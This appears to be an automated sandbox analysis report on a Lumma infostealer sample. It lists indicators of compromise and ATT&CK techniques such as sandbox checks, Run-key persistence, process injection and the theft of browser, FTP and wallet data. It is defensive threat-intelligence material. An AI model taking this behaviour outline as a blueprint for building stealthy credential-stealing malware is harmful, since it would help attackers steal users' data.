lumma | ef3b791caf3b6d690197d2ab9ffb04310e42f7a5a5744827325b2c2d241c25e0

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation	setup.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	QsBxbMAfJNBQCdg_pg0H1RrR.exe

Executes dropped EXE 24 IoCs

pid	Process
2708	7z2406-x64.exe
4876	7zG.exe
2552	7zG.exe
4516	setup.exe
1588	SbOexcXltb2Agn2ru3rsEcbz.exe
2288	5dWOqDmgKaXGKYn8YSJ4kqBc.exe
1512	UveIvkZy0meSnpmxZkeJYnaa.exe
3336	_WP7kdOqbqZzzYP3lTi1fdVu.exe
3324	EujliRSqoNGxQSvgcZwYHM0a.exe
1380	f6McHUkv64D7xAPSGsYLgwj6.exe
3344	A83BCcdrPH0IdZ2cpT2yeQ_I.exe
2076	YkFbnF18WKlD_PdMU7QNB4GR.exe
2648	PfM9di0SFCgdQu5zud76avXo.exe
756	3bqsaxgdhYyZV67bGKzFoGv2.exe
4596	QsBxbMAfJNBQCdg_pg0H1RrR.exe
4276	03CZokS0HonJoqM4c6Xg0U7K.exe
4876	1v7DQzzvtFrGqTe3EOWskSNB.exe
4108	_WP7kdOqbqZzzYP3lTi1fdVu.tmp
2528	Install.exe
4212	linuxmultiMediastudio.exe
1084	linuxmultiMediastudio.exe
3544	Install.exe
1820	world.exe
4624	moigsaw.exe

Loads dropped DLL 4 IoCs

pid	Process
3372	Process not Found
4876	7zG.exe
2552	7zG.exe
4108	_WP7kdOqbqZzzYP3lTi1fdVu.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2406-x64.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000b00000001ac66-1277.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	UveIvkZy0meSnpmxZkeJYnaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	QsBxbMAfJNBQCdg_pg0H1RrR.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
207	iplogger.org
208	iplogger.org

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
111	api.myip.com
112	api.myip.com
114	ipinfo.io
115	ipinfo.io
282	ipinfo.io
283	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1512	UveIvkZy0meSnpmxZkeJYnaa.exe
1512	UveIvkZy0meSnpmxZkeJYnaa.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1588 set thread context of 4512	1588	SbOexcXltb2Agn2ru3rsEcbz.exe	118
PID 2648 set thread context of 3436	2648	PfM9di0SFCgdQu5zud76avXo.exe	127
PID 4276 set thread context of 4724	4276	03CZokS0HonJoqM4c6Xg0U7K.exe	128

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\pa-in.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	7z2406-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2406-x64.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1380	sc.exe
4880	sc.exe
1372	sc.exe
3148	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
68	2288	WerFault.exe	109
2640	2288	WerFault.exe	109
4384	2288	WerFault.exe	109
3652	2288	WerFault.exe	109
1080	2288	WerFault.exe	109
2184	2288	WerFault.exe	109
2124	2288	WerFault.exe	109
4540	2288	WerFault.exe	109
196	2508	WerFault.exe	181

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 16 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
5060	schtasks.exe
2968	schtasks.exe
1584	schtasks.exe
2996	schtasks.exe
4336	schtasks.exe
1048	schtasks.exe
4228	schtasks.exe
1504	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4296	timeout.exe
4944	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies registry class 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2406-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2406-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2406-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2406-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2406-x64.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\7z2406-x64.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1768	OpenWith.exe
4752	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	4744	firefox.exe
Token: SeDebugPrivilege	4744	firefox.exe
Token: SeDebugPrivilege	4744	firefox.exe
Token: SeDebugPrivilege	2708	7z2406-x64.exe
Token: SeDebugPrivilege	2708	7z2406-x64.exe
Token: SeDebugPrivilege	2708	7z2406-x64.exe
Token: SeDebugPrivilege	2708	7z2406-x64.exe
Token: SeDebugPrivilege	2708	7z2406-x64.exe
Token: SeRestorePrivilege	4876	7zG.exe
Token: 35	4876	7zG.exe
Token: SeSecurityPrivilege	4876	7zG.exe
Token: SeSecurityPrivilege	4876	7zG.exe
Token: SeDebugPrivilege	4752	taskmgr.exe
Token: SeSystemProfilePrivilege	4752	taskmgr.exe
Token: SeCreateGlobalPrivilege	4752	taskmgr.exe
Token: SeRestorePrivilege	2552	7zG.exe
Token: 35	2552	7zG.exe
Token: SeSecurityPrivilege	2552	7zG.exe
Token: SeSecurityPrivilege	2552	7zG.exe
Token: SeDebugPrivilege	2648	PfM9di0SFCgdQu5zud76avXo.exe
Token: SeDebugPrivilege	4276	03CZokS0HonJoqM4c6Xg0U7K.exe
Token: SeDebugPrivilege	4724	MSBuild.exe
Token: SeBackupPrivilege	4724	MSBuild.exe
Token: SeSecurityPrivilege	4724	MSBuild.exe
Token: SeSecurityPrivilege	4724	MSBuild.exe
Token: SeSecurityPrivilege	4724	MSBuild.exe
Token: SeSecurityPrivilege	4724	MSBuild.exe
Token: SeDebugPrivilege	4360	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
2708	7z2406-x64.exe
4744	firefox.exe
4744	firefox.exe
4876	7zG.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
2552	7zG.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4744	firefox.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe
4752	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
1768	OpenWith.exe
4744	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1768 wrote to memory of 3664	1768	OpenWith.exe	86
PID 1768 wrote to memory of 3664	1768	OpenWith.exe	86
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 3664 wrote to memory of 4744	3664	firefox.exe	78
PID 4744 wrote to memory of 828	4744	firefox.exe	80
PID 4744 wrote to memory of 828	4744	firefox.exe	80
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
